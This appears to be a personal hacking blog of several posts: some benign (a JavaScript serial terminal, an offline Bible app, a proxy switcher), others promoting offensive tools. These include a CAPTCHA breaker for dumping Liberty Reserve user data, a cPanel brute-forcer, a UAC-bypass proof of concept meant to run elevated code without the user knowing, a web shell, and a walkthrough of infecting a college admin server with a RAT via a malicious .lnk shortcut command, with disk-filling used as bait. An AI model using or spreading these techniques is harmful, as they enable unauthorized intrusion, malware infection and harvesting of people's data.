A simple javascript Hyperterminal made out of MSCOMM supplement

Few days back one of my friends enquired me about the possibility of accessing client side serial ports via javascript. Well it was impossible the direct way but there are many client side serial port plugins available for all browsers (eg:seriality) , even a chrome App could get  direct read/write access to the serial ports. thats when it struck me  that the same could be implemented on an IE App (hta) with very less effort by using ActiveX.

The first name which pops to the mind of a programmer for a simple serial communication object would be MSCOMM, and honestly its been a while since i used it as i always prefered martin gibson’s commMG library as it was more functional than any native object, but to achieve our aim we need an object and MSCOMM has all sorts of problems  like it licensing etc..

Thats when i stumbled upon another object (netcommOCX) which have all the properties , events and methods exactly like MSCOMM.By using it i made a simple javascript hyperterminal , which i hope will be usefull to other amateur programmers like me.

NOTE: For those who want to test the serial port functionality it would be better to install and use this COMPORT emulator(null modem emulator)
i have uploaded the sourcecode with the .hta application.Feel free to drop in your comments..

Download Link: http://www.filefactory.com/file/3ug2c2c4326j/n/javascript_hyperterminal_zip

All credits of this project goes to ashutosh singh  who inspired me for this out-of-the-box project.

Defeating Captcha by image reconstruction !

Hi Friends,
its been a month since my last blog post so today i will be blogging about a Captcha project i did recently which unfortunately ended up as a waste of time as the target went offline the very day the project was completed..

The project was to dump all publicly available User info from libertyreserve as they had a service with which users could get info of other users by just entering in the Target users Account no: (eg: U1234567). But it couldnt be automated as it was protected with captchas, i did a quick research on it and found out those captchas were not of any third party captcha provider. i also found out few other things about libertyreserve captcha ,
1. their turing no: had no relation with the captcha produced.
2. the same turing no: can be used again and again.
3. captcha had an expiry time of 15 minutes .

eg:https://www.libertyreserve.com/captcha.jpg?c=yhrsxh1mAEC382HO9sLN0Q
and
https://www.libertyreserve.com/captcha.jpg?c=test

both harvested captchas.

so that part was ready, but still there was another problem. Those images had to be correctly decrypted with an OCR. Well as you all know Tesseract is one of the freely available OCR in the internet. So i decided to decrypt these images with it, but still encountered problems as those captcha images were filled in with junk colours or line so as to prevent automation and they had no good pixel depth, so i had to redress those images before parsing with tesseract.

one of the obfuscation methods of libertyreserve captchas were that they filled the image area with craters to confuse the OCR it into a new alphabet(not much of an obfuscation though) .so my first step was  to close those gaps with the mean colour in the surrounding pixels. as liberty reserve captchas were bicoloured (ie white as baground and image in red) it was  quite easy for me as i had to just find the amount of Red in it..

so the architecture was ready, all i had to do was now to:
read all the  pixels in the 200*75 image 1 by one,
get the rgb colour of it.
calculate the amount of red in it.if found less than 224 considered as a red colour
find the distance between the last red and last white and if found to be greater than 3 pixels fill up that area.

Make a function to do the above mentioned things both vertically and horizontally..

Autoit doesnt have a native function to get the pixel of a coordinate of an image, so i had to rely on a library named FastFind compiled in C++. The benchmark of my function was 2.7 seconds including the the time Tesseract took to interpret it.
below is an example of a captcha before and after redressing..

Captcha before redressing

Captcha after redressing

Captcha after redressing

Once redressed the pixel depth of the image is automatically increased, so we dont need to convert it into ” tiff “” before parsing with Tesseract, you can try it out manually with this command

tesseract.exe 0393.jpeg output -psm 7 digits

well as for other captcha templates, using image magick would be better as it can save your coding time and fills our limitations. I am currently developing a custom OCR which can be taught by even a kid,i will be blogging about it once i am done with it. i have uploded both the source and the libraries used in this project. Feel free to drop in your comments..

Download Link: http://www.filefactory.com/file/6ipm45m7a3p9/n/captcha_project_zip

All credits of this project goes to my brother LNXROOT and Abhilyall .

SOES – [Shell On Every Server]

Its been a while since i made bruting scripts, After two years i am releasing today another perl script to the hacking community
i cant take credit for all the programs i make, as its someone else who inspires me with the idea for the program.

And 99% of the hacking tools i have made was my brother (LNXROOT) idea..
So enough of the blabbering , Just as wordpress& joomla bruter was a revolution to the hacking community i release SOES – [Shell On Every Server]
SOES comes from the very lineage of my previous bruters..
But what makes SOES unique is that its a bruter with an intelligence or an induced intelligence..
we aspiring hackers have seen many bruters / scripts which brute Cpanels

yes and its no big deal…. as once we shell a server one of the first things hackers do is to upload the cpanel bruting php scripts which extracts usernames from etc/passwd or etc/mail or /home directory and brutes users for default passwords such as 1233456 or admin or password etc.. but what if you want to brute an unknown server’s cpanel.??

its practically impossible or so was people thinking about it..but with SOES we can find the usernames of any website residing on any shared server with the success rate of 70% and brute the Shit out of it!! :)
And moreover its powered with logontube’s api, one of the best reverseip services by the hacking community which gives the best and accurate results.

Note: the tool is a bit slow as i havent incorporated threads in it..

i Hope that would do for the day, As all my projects SOES is also an opensource ..so feel free to modify it to your needs other than the Coded By headers..

Download link: http://www.mediafire.com/?ja6kovo3ivefou9

The Bible (v1.0)

                                                            

bible_passage

bible_keyword

bible_bookmark

Go to developers testimony

“Cluster Shadows”

From the developer’s desk

A rich store of salvation, wisdom and knowledge…..the fear of  the lord is the key to this treasure“…These are the words that God foretold through his beloved prophet Isaiah.
The new international version of the bible(NIV) is an abridged version which was developed by the cryptic and hieroglyphic scholars who translated the scripts from Aramaic,Greek and Hebrew.
The prologue of God’s chosen race and their journey through the deserted lands surrounded by enemies and hardships …from exile to the promised land. This saga of the exodus relates to our day to day life.
‘Creation, Life and beauty..undone by death and wrong doing…Regained by God’s surprising victory’…Through the books of Genesis to Revelation God Almighty unfolds his plan for saving the human race from the clutches of sin..Right down the lane from the Old testament to the visions of St. John where he prophecies the End of Days..
…The songs of Salvation are proclaimed…”Seek and you shall find“..Through my pursuit for the truth I augmented this software to share my reflections on the Holy Bible.

The Offline Bible is a contemporary approach,…..an advanced tool devised to enhance our research on the scriptures. Being a common man I have incorporated all possible ways to assist you on your path to enlightenment.
The feeds in this program are exactly as they appear in the NIV version of the Holy Bible and the sources are encrypted against manipulation.
I kindheartedly welcome you to heed the sanctifying words of God Almighty. One of the pioneering feature I have added on is that the program gets along with all known Operating systems..consuming less than 5% of your Hard disk space and its quite portable.
You can carry it along on your flash drives, smart storage cards or your PDA.

Passage Look up: You have the privilege to read the Holy scriptures along with the markers that helps you to bring up the particular chapters or books by typing in the suitable keywords. For instance the Book of Malachi
Mal 2:1-10 brings up Malachi chapter 2 versus from 1 through 10. The passage will be displayed instantly on the screen with highlighted verses. You can zoom in on the view and customize the fonts for better reading conditions.

Keyword Search:
Supposedly you have a vague memory of a passage or an instance but unable to figure out from which book it is taken from,There’s a striking keyword in that passage that keeps the memory fresh you just turned lucky…
Just run a random search for that keyword…and this feature will enlist the entire bible for passages containing that word…and the results will be brought to your gaze in a matter of seconds with all possible hits.

Bookmark+:
Bookmarks an ease of access tool helps you to bring up the last passage you were reflecting on. The Add on feature in this part of the Offline Bible is the link between a keyword and a passage. Probably you are preparing notes on the inception of mankind,
detailed in the Book of Genesis. So the keyword “creation” can be used to bring up the passage Genesis 2 verses 1-12. I employed this tool to create a decisive study…bookmark+ brings the combined effect of NOTES AND BOOKMARKS which can aid in research and ease access to most visited chapters.
This in turn can make your scripture reading fruitful and blessed.

This version lacks in some areas which I overlooked Perhaps the Index would have been wonderful…And the on screen narrator(A.k.a passage to speech processor) would aid my fellow brethren with eye defects.
I would rectify these faults in my next version. Besides this is an open-source program,..and I gladly welcome you to restructure this project or add other biblical databases to the program like the catholic good news version or the King James version.

Download: http://sourceforge.net/projects/thebible/

Your feedback enable me to grasp more knowledge..so please feel free to drop down your word for me.
 May the grace of the Lord almighty find you and enlighten you my dear brothers and sisters.

-Daryl

Developers Testimony

Well… this project is one of the most time consuming projects i have ever made…

Whole idea about this project came when i was into bible study and as a lazy person i am, i found it hard to browse through the bible for each passage..

The articles were so long and the passage references were in hundreds.. it would have taken me years to read the articles by referring the passages from the bible. So i created a small program which harvests the links of the respective passages to the corresponding biblegateway links. it was awesome, and i could finish half of the articles in about a month.

but it was completely useless when there was no internet connectivity as biblegateway’s bible was an online service and they provided no download links for the bible… so it was my mother who inspired me to make a program , an offline and portable bible… she filled my mind with the ideas of features she needed for the application…

What more does a developer need?

I was wired in and coding…it may surprise you but it took me 31 days to code it..

the first and formost part was the architecture and the source

Architecture, how the program should was made in a day.. next was the source…as we all know there are no publicly available bible databases for download.. so my options were narrowed down to Biblegateway.com
But the hardest part was that they had no specific algorithm or structure for their displayed style source…although it was a hard nut, with the previous experiences i had in deobfuscation and most of all By my GOD’s help i could find a pattern in their source, so i quickly made a perl script which sends GET requests in loops for all the chapters of all the books in the bible to biblegateway..there by extracting all the source..
And with the help of my algorithm i made i deobfuscated them boook by book ,chapter by chapter and verse by verse and added it to an sqlite database.

Now this whole process cost me 11 days ,as i said before they had no specific pattern in their style obfuscation so i had to remake the algorithm again and again..
and rest of the days was taken for me to code its GUI…
As it takes only creative people to code GUI’s in a day :D :D

I have uploaded the sourcecodes of the application and the scripts i used for extraction and deobfuscation along with the binaries on sourceforge.net

you can freely redevelop the application or add other bible db’s to it like the KJV version ..
Provided give credits to the guy who took the time and pain to code it from 0% to 100%

And as i wrap up Project Zion , All the credits for this project goes to my mother Lilly Varghese.

-Daryl

DyNaMiC PrOxY_1.0

Hi friends,
This was an old project i was into few months ago which had to be suspended in between due to incompatibility in 64 bit systems…

The idea for this project was conceived by LNXROOT, and the moment he shared it with me i understood it  was an awesome idea, as there was no proxy application till now which fetched proxies in realtime and change the system proxy in user defined time intervals.
The idea was foolproof. But it had to be coded, the best online webproxy with the largest number of proxies was HideMyAss.com.
But there was a lot of hurdles to overcome before completing the project, one of it was with the deobfuscation of the proxies from hidemyass.com, as explained in the last post i had to develop a custom style interpreter to deobfuscate the proxies from the page source.
The next hurdle was changing the system proxy, as you all know its easy to change the system proxy via registry but changing it in realtime was not possible as once changed through registry the browser had to reloaded / internet settings had to be refreshed.My first approach was to run inetcpl.cpl and get the frame handle lateron enabling the system proxy, but it didnt work out as i planned ,so at last i found a way to accomplish it by using the windows api(wininet.dll)

i have uploaded both the source and binaries.. ENJOY!!
and do let me know if there are any bugs.

Please do Share and comment if you like the application..
Download linkhttps://sourceforge.net/projects/dynamicproxy/

http://www.filefactory.com/file/5t0happllspp/n/Dynamic_Proxy_v1_0_build_rar

All Credits goes to my brother LNXROOT

Deobfuscating HideMyAss Proxies

Few Days back i did a Dynamic Proxy Project for my brother LNXROOT, although it was a simple project it has not been released due to some compatibility issues on 64 bit computers.So the Proxy application retrieved fresh online proxies from HideMyAss.com in real time and changes the system prosy settings in user defined intervals..

sounds easy ..right?

but  it wasnt so easy to code it as HideMyAss obfuscates its proxies via style obfuscation, and the real challenge was to create a partial css interpreter.And eventually i was able to code it although i had experienced some troubles with its regex. And have to say Autoit Forums is very helpfull to a novoice like me. Fluttershy from Autoit forums lateron also came up with a small and fast UDF for hidemyass ,anyways i have uploaded my source of the deobfuscator and a small application which works via my function to extract hidemyass proxies for those who doesnt know Autoit and not into coding.

here is the download link: http://www.filefactory.com/file/pmwe1np6flr/n/Proxy_extractor_1_0_releasepack_rar

this release pack includes the binaries and the source.

Now apart from coding i have something to share, we often forget/Fail to remember the people who stood beside us helped and supported us before we became the one we are right now..If i have ignored any of such People knowingly or unknowingly i am really sorry.. it just keep happening because i spent 15 hours a day on a computer.

All Thanks Goes to my brother Ankur Tiwari who was always there at my side ready to help me in whatever way possible!!

Uac a total Joke!

Few days back i developed a simple program to bypass UAC prompts, now you may ask why should we bypass uac when we can configure it or even disable it.. well there are many reasons to it,
my reason to develop the program was to execute with elevated privilages on the host pc without the knowledge of its user.

In Windows7 although the user belongs to the admnistrator localgroup,a process can only be run with system privilages if its verified by the UAC(provided uac is turned on). My first approach was to Run Task with elevated privilages from the task manager as there is provision for it,

ie to run the task with administrative privilages after clicking the button “Show Processes from all users”.

 I was successful to a limit in automating it, ie till clicking the button by first getting the handle to the taskmanager window and lateron control clicking it on the button control.

No program can simulate the above , and these actions can only be done by a Genuine user. 

what i didnt know was that UAC was designed to be NOT – Automated. As soon as we clicked the button taskmanager restarts , which cant be attached/or get a handle to..
At first i thought it to be a bug in the send function in autoit..but later on understood the reason .

I didnt want to run a local root exploit every now and then to run a program with system privilages as it was not cool and i didnt want to rape a coputer again and again..so i was searching for another way when i stumbled upon accent’s IOFunction,(All Credits go to him) derived from InpOut32 which is a windows DLL and Driver to give direct access to hardware ports (for example the parallel and serial port from user level programs. It is originally developed by the people at Logix4U for Windows 9x and 32bit variations of NT (NT/2000/XP/2003 etc.).

Well this was huge, i mean when UAC (process name: consent.exe) is invoked, No process irrespective of its inherited privilages could get a handle or even atleast send keys expecting uac window was in focus. So with inpout32 i could get direct access ie equivalent to sending keys from the keyboard. Even though this was a big breakthrough i couldn’t solve the riddle because to install a driver in windows versions prior to vista it has to be registered or at-least copied into the %system% directory (doesn’t work all the time) , which apparently needed Admin privileges.

It is when by chance i came to notice that the Folder action confirmation form was not protected by UAC.

But still there was no way programmatically we could invoke this form, ie a basic copy function from an exe just fails if it hasnt enough privileges. Now since Windows considers all human actions, which include shortcuts as Genuine user operations. i could copy inpout32 into the clipboard and then by mimicking a Ctrl+V, i could literally fool windows into copying/installing those DLL’s into the system directory.

With that done, the next part was infact to actually bypass uac,
For that all i had to do was to check whether the process consent.exe was actually running and send keys via the IOFunction
“0×38″ ; ALT-Down
“0×15″ ; Y
“0xB8″ ; ALT-UP (0×38+0×80)

thereby Bypassing UAC and executing any desired program with Elevated privileges.
I Reported it to Microsoft Security Response Center a month after the finding and they responded
This behavior is By Design– that is, Windows allows users to install 3rd party drivers, which by necessity have privileges that user-mode applications do not.We do not consider UAC a security boundary.
I have attached Both Source code(in Autoit) and the Binaries of the POC which works on Windows Ultimate 32bit system with its Source code.
I havent tested it on 64 bit Windows Ultimate and i believe it should work.

UPDATE: Tested it on windows8 and it works like a charm !

here is the download link :

21/11/2012

http://www.filefactory.com/file/shanbpdihat/uacrefurnish.rar

http://www.fileserve.com/file/zcxFK6K/b47chguru.rar 

http://www.filefactory.com/file/2e4mon04nhy9/n/b47chguru_rar

Thanks to my brother LNXROOT   who has always been at my side supporting and inspiring me :)  

Logontube now provides the reverseip service..!!

Finally after a long time logontube is Up and running.Thanks to all my friends who have supported me throughout my every project.logontube now provides a reverseip service for free..!! :)
Unlike other online reverseip services which are only based on google. logontube uses all the available search engines to maximise the results and the results are verified so that there are no false positives.!
Each time a reverse-ip search on a unique ip is done all the results are stored in the website’s reverse ip database.
the Database is available for Public download free of cost every first of the month…or anyone who urgently need them (hackers/students/webmasters..etc) can mail me at interestingpal@gmail.com or daryl.varghese@facebook.com.

Moreover logontube also offers free access to its reverse ip API , so that anyone who wants to incorporate the reverseip service into their tools can use the API in the following way

a GET request to http://reverseip.logontube.com/?site=logontube.com

the results will be returned in plain text.
for any queries or suggestions mail me at interestingpal@gmail.com

Hacking a computer on lan with its network share drive

Its been a while since i have blogged,so today i would be describing how to hack into a pc on lan which has a nettork shared drive.as the saying goes “Necessity is the Mother of Invention” 6 months before when i was at my college hostel by mistake i did an ip scan on our network and found the college admin server had a network shared drive with read/write privilages.So just like any person my first thinking was to find an exploit in exploit-db or packetstorm or 1337day..but to my bad luck there wasnt any remote root exploits for windows server 2003.
so i thought its better to do some social engineering technique and fool the admin to run my rat(z77)but it had to be done with the least human interaction. So i decided to use the propagation technique used by win32:sality 2nd gen virus..unlike other viruses it doesnt use autorun/folder to folder copying techniques for spreading but what it does is that it makes a malicious shortcut to a folder and sets the folder attributes to hidden…now here is the best part, the shortcut itself is malicious..to those who dont know the parts of a shortcut/.lnk file in windows

The windows shortcut file contains these parameters

Working directory.

Target directory

Additional file arguments

Description

Icon

Icon number

so by tampering it it is possible to open both the folder and executable file,the user wont know a thing about it because the icon idex will be set to 4 which is the folder icon.

ex:

%windir%\system32\cmd.exe /c start EXPLORER.EXE study & start RECY CLE.BIN\t2.exe

tampering the target directory parameter with the following command opens the folder named study and at the same time executing the file t2.exe.

So now i had the technique i coded a simple tool in my favourite language perl to the above on all the folders on the shared folder. Still there was a problem left out.As it had to be done with less human interaction, How to make the victim click the shortcut file??

for that i modified my perl code to make copies of large files on the network share so that eventually the drive’s free space will run out ,therby getting the attention of the victim…and the victim when trying to investigate the matter accidently clicks our malicious shortcut and gets infected.

i have coded a similar program in autoit for my bro j4v3dkhan

Continue reading

D.K shell a reality..!!!

After 7 months of researching and developing…
D.K shell is finally released.I hope it will the shell any hacker would love to use…well i had to face lots of problems during its development..some of them was developing the auto password changer for vb…

as vb uses md5 hash and a salt to process the passwords…
secondly was with the symlink feature to work without timeout when tried to execute on a server having more than 3000 sites hosted on it…

anyways its done….altogether D.K shell is the next generation web shell for hackers..!!
download link: http://sourceforge.net/projects/icfdkshell/